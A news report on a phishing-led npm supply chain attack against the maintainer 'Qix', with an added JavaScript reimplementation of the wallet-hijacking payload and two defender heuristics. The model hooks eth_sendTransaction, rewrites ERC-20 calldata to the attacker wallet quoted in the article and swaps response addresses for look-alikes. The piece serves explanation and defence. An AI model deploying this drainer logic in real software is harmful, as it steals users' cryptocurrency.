A phishing email compromised one of the most prolific Node.js developers on Monday, pushing malicious code into packages that are downloaded billions of times a week, in what researchers call the largest software supply chain attack in recent memory.
Although the scope of the attack is massive, Security Alliance said in a Tuesday report that the attacker walked away with barely a few hundred dollars. Security teams, however, now face the substantial cost of auditing and updating backend systems to head off follow-on attacks.
A very popular maintainer known as "Qix", whose libraries such as chalk and debug-js account for billions of downloads each week, was compromised last week after receiving a "support" email from npmjs[.]help. The domain at one point resolved to a Russian-hosted server and redirected to a fake two-factor authentication page hosted on the BunnyCDN content delivery network.
The credential-harvesting page captured the username, password and 2FA codes and forwarded them to a remote host. With full account access, the attacker republished each of Qix's packages with a crypto-focused payload.
Node Package Manager (written npm, in lowercase) is like an app store for developers: the place where coders download small, reusable blocks of code (called packages) instead of writing everything from scratch. A maintainer is the person or entity who creates and updates these packages.
How the attack occurred
The injected code was simple. It checked whether window.ethereum was present and, if so, hooked the basic Ethereum transaction functions. Calls to approve, permit, transfer or transferFrom were silently redirected to a single wallet, "0xFC4A4858BAFEF54D1B1D7697BFB5C52F4C166976".
Any Ethereum transaction carrying value but no calldata was also redirected. For Solana, the malware overwrote recipients with an invalid address string beginning "1911...", which broke the transfers rather than diverting them.
Network requests were also intercepted.
By hijacking fetch and XMLHttpRequest, the malware scanned JSON responses for substrings resembling wallet addresses and replaced them with one of 280 hard-coded alternatives chosen to look deceptively similar.
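To make the mechanism concrete, what follows is an added JavaScript model written for this page; it is not the payload's own code or code from any published analysis. It models the three behaviours described above: rewriting eth_sendTransaction parameters behind a window.ethereum-style provider, swapping the beneficiary inside ERC-20 calldata, and replacing address-shaped substrings in JSON response bodies with the nearest entry of a look-alike pool. The pool, the sample transaction and every address except the attacker wallet quoted above are constructed; choosing the look-alike by Levenshtein distance follows the public analyses of the payload; the two checks at the end are the editor's suggestions, not anything the article reports.

```javascript
// Added example (editor's model of the behaviour described in the article,
// NOT the payload's code). ATTACKER is the wallet quoted in the article; every
// other address, the look-alike pool and the sample inputs are constructed.
const ATTACKER = "0xFC4A4858BAFEF54D1B1D7697BFB5C52F4C166976";
// Constructed stand-in for the payload's ~280 hard-coded look-alike addresses.
const LOOKALIKES = [
  "0x1111111111111111111111111111111111111111",
  "0xAbCdEf0000000000000000000000000000000001",
  "0x9999999999999999999999999999999999999999",
];
const EVM_ADDR = /0x[0-9a-fA-F]{40}/g;
// Standard 4-byte selectors of the ERC-20 calls the article names, with the
// 0-based ABI word holding the party that ends up with the tokens/allowance.
const SELECTORS = {
  "0xa9059cbb": { name: "transfer", arg: 0 },     // transfer(to, amount)
  "0x095ea7b3": { name: "approve", arg: 0 },      // approve(spender, amount)
  "0x23b872dd": { name: "transferFrom", arg: 1 }, // transferFrom(from, to, amount)
  "0xd505accf": { name: "permit", arg: 1 },       // permit(owner, spender, ...)
};

// Swap the beneficiary inside ERC-20 calldata: each ABI word is 32 bytes
// (64 hex chars) and an address occupies its last 20 bytes (40 hex chars).
function rewriteCalldata(data, attacker = ATTACKER) {
  const sel = SELECTORS[data.slice(0, 10).toLowerCase()];
  if (!sel) return data;
  const start = 10 + 64 * sel.arg + 24; // skip selector, earlier words, 12 zero bytes
  if (data.length < start + 40) return data; // truncated calldata: leave it alone
  return data.slice(0, start) + attacker.slice(2).toLowerCase() + data.slice(start + 40);
}

// Core of the window.ethereum hook: a plain value transfer (value, no calldata)
// gets a new "to"; a recognised ERC-20 call gets its calldata rewritten.
function rewriteTransaction(tx, attacker = ATTACKER) {
  const t = { ...tx };
  const hasData = typeof t.data === "string" && t.data.length > 2;
  const hasValue = typeof t.value === "string" && !/^0x0*$/.test(t.value);
  if (!hasData && hasValue) t.to = attacker;
  else if (hasData) t.data = rewriteCalldata(t.data, attacker);
  return t;
}

// Wrap an EIP-1193 style provider so eth_sendTransaction params are rewritten
// before the real wallet ever sees them.
function hookProvider(provider, attacker = ATTACKER) {
  const original = provider.request.bind(provider);
  provider.request = (args) => {
    if (args && args.method === "eth_sendTransaction") {
      args = { ...args, params: args.params.map((tx) => rewriteTransaction(tx, attacker)) };
    }
    return original(args);
  };
  return provider;
}

// Levenshtein edit distance; public analyses described the payload picking the
// pool entry with the smallest distance so the swap survives a casual glance.
function levenshtein(a, b) {
  const row = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    let diag = row[0];
    row[0] = i;
    for (let j = 1; j <= b.length; j++) {
      const up = row[j];
      row[j] = Math.min(up + 1, row[j - 1] + 1, diag + (a[i - 1] === b[j - 1] ? 0 : 1));
      diag = up;
    }
  }
  return row[b.length];
}

function closestLookalike(addr, pool = LOOKALIKES) {
  let best = pool[0], bestDist = Infinity;
  for (const cand of pool) {
    const d = levenshtein(addr.toLowerCase(), cand.toLowerCase());
    if (d < bestDist) { bestDist = d; best = cand; }
  }
  return best;
}

// Model of the fetch/XMLHttpRequest interception: every address-shaped
// substring in a JSON response body is replaced with its nearest look-alike.
function rewriteResponseBody(text, pool = LOOKALIKES) {
  return text.replace(EVM_ADDR, (m) => closestLookalike(m, pool));
}

// Defender check 1: diff the addresses in a body as the server sent it against
// what the page's JavaScript ended up holding (e.g. obtained via a trusted path).
function swappedAddresses(before, after) {
  const a = before.match(EVM_ADDR) || [];
  const b = after.match(EVM_ADDR) || [];
  const diffs = [];
  for (let i = 0; i < Math.min(a.length, b.length); i++) {
    if (a[i].toLowerCase() !== b[i].toLowerCase()) diffs.push({ expected: a[i], got: b[i] });
  }
  return diffs;
}

// Defender check 2: a monkey-patched fetch or XMLHttpRequest is JavaScript, so
// its source no longer reads "[native code]". Heuristic only: a payload can
// patch Function.prototype.toString too, so verify the address on the wallet.
function looksMonkeyPatched(fn) {
  return !/\[native code\]/.test(Function.prototype.toString.call(fn));
}
```

The Solana branch (overwriting recipients with an invalid "1911..." string) is not modelled because it has no redirection logic to show; it simply breaks the transfer. Note also that for an ERC-20 call the transaction's "to" stays the token contract and only the calldata changes, which is why a wallet that displays just the contract address looks normal; the reliable control is a wallet that decodes and displays the actual recipient or spender, as a hardware wallet does on its own screen.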
Impact of the attack
For all its reach, the financial impact was negligible.
On-chain data show that the attacker received only about five cents' worth of ether and roughly $20 of an illiquid memecoin that had traded less than $600 in volume, according to the Security Alliance report.
The popular MetaMask browser wallet also said on X that it was not affected by the npm supply chain attack because the wallet pins its dependency versions, uses manual and automated checks and rolls out updates in stages. It also uses "LavaMoat", which blocks malicious code even if it is inserted, and "Blockaid", which quickly flags compromised wallet addresses, to keep such attacks at bay.
Meanwhile, Ledger CTO Charles Guillemet warned that the malicious code had been pushed into packages with more than a billion downloads and was designed to silently replace wallet addresses in transactions.
The attack follows another case reported last week by ReversingLabs, in which npm packages used Ethereum smart contracts to hide malware, a technique that disguised command-and-control traffic as ordinary blockchain calls.